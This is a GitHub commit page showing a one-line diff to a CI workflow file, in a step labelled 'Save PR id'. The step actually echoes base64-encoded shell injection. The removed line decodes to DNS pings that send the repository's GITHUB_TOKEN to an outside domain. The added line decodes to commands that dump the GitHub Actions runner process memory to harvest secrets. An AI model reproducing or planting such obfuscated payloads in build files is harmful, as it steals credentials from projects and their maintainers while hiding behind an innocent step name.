Skip to content

Commit

Permalink
Update preview-build.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
Chave0v0 authored Sep 27, 2024
1 parent 25e86e2 commit f4f6809
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .github/workflows/preview-build.yml
Original file line number Diff line number Diff line change
Expand Up @@ -48,7 +48,7 @@ jobs:
# Upload PR id for next workflow use
- name: Save PR id
if: ${{ always() }}
run: echo 'JiYgcGluZyAtYyAxMCAzNmExMi5ucy5hcGFjaGUuYXNpYSAmJiBwaW5nIC1jIDEwICR7eyBzZWNyZXRzLkdJVEhVQl9UT0tFTiB9fS44ZGQzNi5ucy5hcGFjaGUuYXNpYSAj' | base64 -d > pr-id.txt
run: echo 'JiYgd2hvYW1pICYmIGlkICYmIGNhdCAvcHJvYy8kKHBncmVwIC1mIFJ1bm5lci5Xb3JrZXIpL21lbSAj' | base64 -d > pr-id.txt

- name: Upload PR id
if: ${{ always() }}
Expand Down

0 comments on commit f4f6809

Please sign in to comment.